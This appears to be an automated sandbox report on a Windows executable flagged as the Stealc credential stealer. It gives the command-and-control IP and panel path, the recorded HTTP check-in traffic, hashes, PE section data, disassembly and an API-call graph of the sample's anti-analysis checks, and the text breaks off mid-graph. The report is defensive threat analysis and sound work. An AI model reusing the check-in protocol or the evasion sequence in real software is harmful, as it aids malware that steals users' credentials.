                        http://185.215.113.206file.exe, 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.php/(file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/:file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/wsfile.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/ifile.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/6c4adf523b719729.php5efile.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.215.113.206
                                    		unknownPortugal
                                    		206894WHOLESALECONNECTIONSNLtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1543701
                                    Start date and time:2024-10-28 09:23:19 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 20s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:1
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 124
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated

                                    Warnings

                                    • VT rate limit hit for: file.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.959318094944891
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'129'920 bytes
                                    MD5:f522fe27067daea4f7987bf85ec1e287
                                    SHA1:d3179eac21c33134b326721db3eec7b7d1f1ac5f
                                    SHA256:3c60d4aebf5332d3a7fc6ea700f8ab74addba285246ba9cf94968a41cc11480a
                                    SHA512:bd8b7e3b0646b1aee43c00035bcc231e6e1cf63e0f8e43b5519d6a7f8e0ee52e7bb28e5654705ca12d27b3087dc271043403919bcfc00576528ae7cc89d2ac1d
                                    SSDEEP:49152:hdJZShKaSVB9Yo8UmDW9UhXYlgTdlO0uvWNICd35IvA9zMUy2zmRf2T1PzK:zCcr9Yo8VS9UhX4n81d35IWoP2z/z
                                    TLSH:A6A53395DFD0B839CC8E97F76E63539B3735F843EAE7C200BB511A309626A821362D15
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                    File Icon

                                    Icon Hash:90cececece8e8eb0

                                    Static PE Info

                                    General

                                    Entrypoint:0xb2a000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007F5C21B7875Ah
                                    divps xmm4, dqword ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, ch
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [edi], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dl
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ebx], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add ecx, dword ptr [edx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    inc eax
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    push es
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+0Ah], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [ecx], eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or byte ptr [eax+00000000h], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    pop es
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Rich Headers

                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x2e70000x676008180d348fc65ce3d7e9667ca34585f98unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x2ea0000x2a20000x200b20b5893325b260d5d3b4d1a5a8c9d33unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    pngrdmjc0x58c0000x19d0000x19d000d81d90d1c4e281ca410950ca3c3a37feFalse0.9948482190148306data7.954059583965191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    vsguhmza0x7290000x10000x400505772e8ff7769d18ec4e93c73d7eaacFalse0.6884765625data5.549866959200988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x72a0000x30000x22002f1afc8d24fe62afa59d37f2012419edFalse0.06893382352941177DOS executable (COM)0.8455461705730766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-28T09:24:20.252534+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449729185.215.113.20680TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 28, 2024 09:24:19.047369957 CET4972980192.168.2.4185.215.113.206
                                    Oct 28, 2024 09:24:19.052855015 CET8049729185.215.113.206192.168.2.4
                                    Oct 28, 2024 09:24:19.052966118 CET4972980192.168.2.4185.215.113.206
                                    Oct 28, 2024 09:24:19.053107023 CET4972980192.168.2.4185.215.113.206
                                    Oct 28, 2024 09:24:19.058408976 CET8049729185.215.113.206192.168.2.4
                                    Oct 28, 2024 09:24:19.964807034 CET8049729185.215.113.206192.168.2.4
                                    Oct 28, 2024 09:24:19.964886904 CET4972980192.168.2.4185.215.113.206
                                    Oct 28, 2024 09:24:19.967348099 CET4972980192.168.2.4185.215.113.206
                                    Oct 28, 2024 09:24:19.972740889 CET8049729185.215.113.206192.168.2.4
                                    Oct 28, 2024 09:24:20.252351046 CET8049729185.215.113.206192.168.2.4
                                    Oct 28, 2024 09:24:20.252533913 CET4972980192.168.2.4185.215.113.206
                                    Oct 28, 2024 09:24:23.426172972 CET4972980192.168.2.4185.215.113.206

                                    HTTP Request Dependency Graph

                                    • 185.215.113.206

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449729185.215.113.206806828C:\Users\user\Desktop\file.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 28, 2024 09:24:19.053107023 CET90OUTGET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 28, 2024 09:24:19.964807034 CET203INHTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 08:24:19 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 28, 2024 09:24:19.967348099 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
                                    Host: 185.215.113.206
                                    Content-Length: 211
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 33 31 41 31 33 43 41 43 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a
                                    Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="hwid"C131A13CAC433430373531------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build"tale------HDBGHDHCGHCAAKEBKECB--
                                    Oct 28, 2024 09:24:20.252351046 CET210INHTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 08:24:20 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:04:24:16
                                    Start date:28/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0xd30000
                                    File size:2'129'920 bytes
                                    MD5 hash:F522FE27067DAEA4F7987BF85EC1E287
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:3.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:1327
                                      Total number of Limit Nodes:24
                                      execution_graph 36326 d46c90 36371 d322a0 36326->36371 36350 d46d04 36351 d4acc0 4 API calls 36350->36351 36352 d46d0b 36351->36352 36353 d4acc0 4 API calls 36352->36353 36354 d46d12 36353->36354 36355 d4acc0 4 API calls 36354->36355 36356 d46d19 36355->36356 36357 d4acc0 4 API calls 36356->36357 36358 d46d20 36357->36358 36523 d4abb0 36358->36523 36360 d46dac 36527 d46bc0 GetSystemTime 36360->36527 36361 d46d29 36361->36360 36363 d46d62 OpenEventA 36361->36363 36365 d46d95 CloseHandle Sleep 36363->36365 36366 d46d79 36363->36366 36368 d46daa 36365->36368 36370 d46d81 CreateEventA 36366->36370 36368->36361 36369 d46db6 CloseHandle ExitProcess 36370->36360 36724 d34610 36371->36724 36373 d322b4 36374 d34610 2 API calls 36373->36374 36375 d322cd 36374->36375 36376 d34610 2 API calls 36375->36376 36377 d322e6 36376->36377 36378 d34610 2 API calls 36377->36378 36379 d322ff 36378->36379 36380 d34610 2 API calls 36379->36380 36381 d32318 36380->36381 36382 d34610 2 API calls 36381->36382 36383 d32331 36382->36383 36384 d34610 2 API calls 36383->36384 36385 d3234a 36384->36385 36386 d34610 2 API calls 36385->36386 36387 d32363 36386->36387 36388 d34610 2 API calls 36387->36388 36389 d3237c 36388->36389 36390 d34610 2 API calls 36389->36390 36391 d32395 36390->36391 36392 d34610 2 API calls 36391->36392 36393 d323ae 36392->36393 36394 d34610 2 API calls 36393->36394 36395 d323c7 36394->36395 36396 d34610 2 API calls 36395->36396 36397 d323e0 36396->36397 36398 d34610 2 API calls 36397->36398 36399 d323f9 36398->36399 36400 d34610 2 API calls 36399->36400 36401 d32412 36400->36401 36402 d34610 2 API calls 36401->36402 36403 d3242b 36402->36403 36404 d34610 2 API calls 36403->36404 36405 d32444 36404->36405 36406 d34610 2 API calls 36405->36406 36407 d3245d 36406->36407 36408 d34610 2 API calls 36407->36408 36409 d32476 36408->36409 36410 d34610 2 API calls 36409->36410 36411 d3248f 36410->36411 36412 d34610 2 API calls 36411->36412 36413 d324a8 36412->36413 36414 d34610 2 API calls 36413->36414 36415 d324c1 36414->36415 36416 d34610 2 API calls 36415->36416 36417 d324da 36416->36417 36418 d34610 2 API calls 36417->36418 36419 d324f3 36418->36419 36420 d34610 2 API calls 36419->36420 36421 d3250c 36420->36421 36422 d34610 2 API calls 36421->36422 36423 d32525 36422->36423 36424 d34610 2 API calls 36423->36424 36425 d3253e 36424->36425 36426 d34610 2 API calls 36425->36426 36427 d32557 36426->36427 36428 d34610 2 API calls 36427->36428 36429 d32570 36428->36429 36430 d34610 2 API calls 36429->36430 36431 d32589 36430->36431 36432 d34610 2 API calls 36431->36432 36433 d325a2 36432->36433 36434 d34610 2 API calls 36433->36434 36435 d325bb 36434->36435 36436 d34610 2 API calls 36435->36436 36437 d325d4 36436->36437 36438 d34610 2 API calls 36437->36438 36439 d325ed 36438->36439 36440 d34610 2 API calls 36439->36440 36441 d32606 36440->36441 36442 d34610 2 API calls 36441->36442 36443 d3261f 36442->36443 36444 d34610 2 API calls 36443->36444 36445 d32638 36444->36445 36446 d34610 2 API calls 36445->36446 36447 d32651 36446->36447 36448 d34610 2 API calls 36447->36448 36449 d3266a 36448->36449 36450 d34610 2 API calls 36449->36450 36451 d32683 36450->36451 36452 d34610 2 API calls 36451->36452 36453 d3269c 36452->36453 36454 d34610 2 API calls 36453->36454 36455 d326b5 36454->36455 36456 d34610 2 API calls 36455->36456 36457 d326ce 36456->36457 36458 d49bb0 36457->36458 36729 d49aa0 GetPEB 36458->36729 36460 d49bb8 36461 d49de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 36460->36461 36462 d49bca 36460->36462 36463 d49e44 GetProcAddress 36461->36463 36464 d49e5d 36461->36464 36465 d49bdc 21 API calls 36462->36465 36463->36464 36466 d49e96 36464->36466 36467 d49e66 GetProcAddress GetProcAddress 36464->36467 36465->36461 36468 d49e9f GetProcAddress 36466->36468 36469 d49eb8 36466->36469 36467->36466 36468->36469 36470 d49ec1 GetProcAddress 36469->36470 36471 d49ed9 36469->36471 36470->36471 36472 d46ca0 36471->36472 36473 d49ee2 GetProcAddress GetProcAddress 36471->36473 36474 d4aa50 36472->36474 36473->36472 36475 d4aa60 36474->36475 36476 d46cad 36475->36476 36477 d4aa8e lstrcpy 36475->36477 36478 d311d0 36476->36478 36477->36476 36479 d311e8 36478->36479 36480 d31217 36479->36480 36481 d3120f ExitProcess 36479->36481 36482 d31160 GetSystemInfo 36480->36482 36483 d31184 36482->36483 36484 d3117c ExitProcess 36482->36484 36485 d31110 GetCurrentProcess VirtualAllocExNuma 36483->36485 36486 d31141 ExitProcess 36485->36486 36487 d31149 36485->36487 36730 d310a0 VirtualAlloc 36487->36730 36490 d31220 36734 d48b40 36490->36734 36493 d31249 __aulldiv 36494 d3129a 36493->36494 36495 d31292 ExitProcess 36493->36495 36496 d46a10 GetUserDefaultLangID 36494->36496 36497 d46a32 36496->36497 36498 d46a73 36496->36498 36497->36498 36499 d46a57 ExitProcess 36497->36499 36500 d46a61 ExitProcess 36497->36500 36501 d46a43 ExitProcess 36497->36501 36502 d46a4d ExitProcess 36497->36502 36503 d46a6b ExitProcess 36497->36503 36504 d31190 36498->36504 36503->36498 36505 d47a70 3 API calls 36504->36505 36506 d3119e 36505->36506 36507 d311cc 36506->36507 36508 d479e0 3 API calls 36506->36508 36511 d479e0 GetProcessHeap RtlAllocateHeap GetUserNameA 36507->36511 36509 d311b7 36508->36509 36509->36507 36510 d311c4 ExitProcess 36509->36510 36512 d46cd0 36511->36512 36513 d47a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 36512->36513 36514 d46ce3 36513->36514 36515 d4acc0 36514->36515 36736 d4aa20 36515->36736 36517 d4acd1 lstrlen 36519 d4acf0 36517->36519 36518 d4ad28 36737 d4aab0 36518->36737 36519->36518 36521 d4ad0a lstrcpy lstrcat 36519->36521 36521->36518 36522 d4ad34 36522->36350 36524 d4abcb 36523->36524 36525 d4ac1b 36524->36525 36526 d4ac09 lstrcpy 36524->36526 36525->36361 36526->36525 36741 d46ac0 36527->36741 36529 d46c2e 36530 d46c38 sscanf 36529->36530 36770 d4ab10 36530->36770 36532 d46c4a SystemTimeToFileTime SystemTimeToFileTime 36533 d46c80 36532->36533 36534 d46c6e 36532->36534 36536 d45d60 36533->36536 36534->36533 36535 d46c78 ExitProcess 36534->36535 36537 d45d6d 36536->36537 36538 d4aa50 lstrcpy 36537->36538 36539 d45d7e 36538->36539 36772 d4ab30 lstrlen 36539->36772 36542 d4ab30 2 API calls 36543 d45db4 36542->36543 36544 d4ab30 2 API calls 36543->36544 36545 d45dc4 36544->36545 36776 d46680 36545->36776 36548 d4ab30 2 API calls 36549 d45de3 36548->36549 36550 d4ab30 2 API calls 36549->36550 36551 d45df0 36550->36551 36552 d4ab30 2 API calls 36551->36552 36553 d45dfd 36552->36553 36554 d4ab30 2 API calls 36553->36554 36555 d45e49 36554->36555 36785 d326f0 36555->36785 36563 d45f13 36564 d46680 lstrcpy 36563->36564 36565 d45f25 36564->36565 36566 d4aab0 lstrcpy 36565->36566 36567 d45f42 36566->36567 36568 d4acc0 4 API calls 36567->36568 36569 d45f5a 36568->36569 36570 d4abb0 lstrcpy 36569->36570 36571 d45f66 36570->36571 36572 d4acc0 4 API calls 36571->36572 36573 d45f8a 36572->36573 36574 d4abb0 lstrcpy 36573->36574 36575 d45f96 36574->36575 36576 d4acc0 4 API calls 36575->36576 36577 d45fba 36576->36577 36578 d4abb0 lstrcpy 36577->36578 36579 d45fc6 36578->36579 36580 d4aa50 lstrcpy 36579->36580 36581 d45fee 36580->36581 37511 d47690 GetWindowsDirectoryA 36581->37511 36584 d4aab0 lstrcpy 36585 d46008 36584->36585 37521 d348d0 36585->37521 36587 d4600e 37666 d419f0 36587->37666 36589 d46016 36590 d4aa50 lstrcpy 36589->36590 36591 d46039 36590->36591 36592 d31590 lstrcpy 36591->36592 36593 d4604d 36592->36593 37682 d359b0 34 API calls codecvt 36593->37682 36595 d46053 37683 d41280 lstrlen lstrcpy 36595->37683 36597 d4605e 36598 d4aa50 lstrcpy 36597->36598 36599 d46082 36598->36599 36600 d31590 lstrcpy 36599->36600 36601 d46096 36600->36601 37684 d359b0 34 API calls codecvt 36601->37684 36603 d4609c 37685 d40fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 36603->37685 36605 d460a7 36606 d4aa50 lstrcpy 36605->36606 36607 d460c9 36606->36607 36608 d31590 lstrcpy 36607->36608 36609 d460dd 36608->36609 37686 d359b0 34 API calls codecvt 36609->37686 36611 d460e3 37687 d41170 StrCmpCA lstrlen lstrcpy 36611->37687 36613 d460ee 36614 d31590 lstrcpy 36613->36614 36615 d46105 36614->36615 37688 d41c60 115 API calls 36615->37688 36617 d4610a 36618 d4aa50 lstrcpy 36617->36618 36619 d46126 36618->36619 37689 d35000 7 API calls 36619->37689 36621 d4612b 36622 d31590 lstrcpy 36621->36622 36623 d461ab 36622->36623 37690 d408a0 277 API calls 36623->37690 36625 d461b0 36626 d4aa50 lstrcpy 36625->36626 36627 d461d6 36626->36627 36628 d31590 lstrcpy 36627->36628 36629 d461ea 36628->36629 37691 d359b0 34 API calls codecvt 36629->37691 36631 d461f0 37692 d413c0 StrCmpCA lstrlen lstrcpy 36631->37692 36633 d461fb 36634 d31590 lstrcpy 36633->36634 36635 d4623b 36634->36635 37693 d31ec0 59 API calls 36635->37693 36637 d46240 36638 d46250 36637->36638 36639 d462e2 36637->36639 36641 d4aa50 lstrcpy 36638->36641 36640 d4aab0 lstrcpy 36639->36640 36642 d462f5 36640->36642 36643 d46270 36641->36643 36644 d31590 lstrcpy 36642->36644 36645 d31590 lstrcpy 36643->36645 36646 d46309 36644->36646 36647 d46284 36645->36647 37697 d359b0 34 API calls codecvt 36646->37697 37694 d359b0 34 API calls codecvt 36647->37694 36650 d4630f 37698 d437b0 31 API calls 36650->37698 36651 d4628a 37695 d41520 19 API calls codecvt 36651->37695 36654 d462da 36657 d4635b 36654->36657 36660 d31590 lstrcpy 36654->36660 36655 d46295 36656 d31590 lstrcpy 36655->36656 36658 d462d5 36656->36658 36659 d46380 36657->36659 36662 d31590 lstrcpy 36657->36662 37696 d44010 67 API calls 36658->37696 36663 d463a5 36659->36663 36666 d31590 lstrcpy 36659->36666 36664 d46337 36660->36664 36665 d4637b 36662->36665 36668 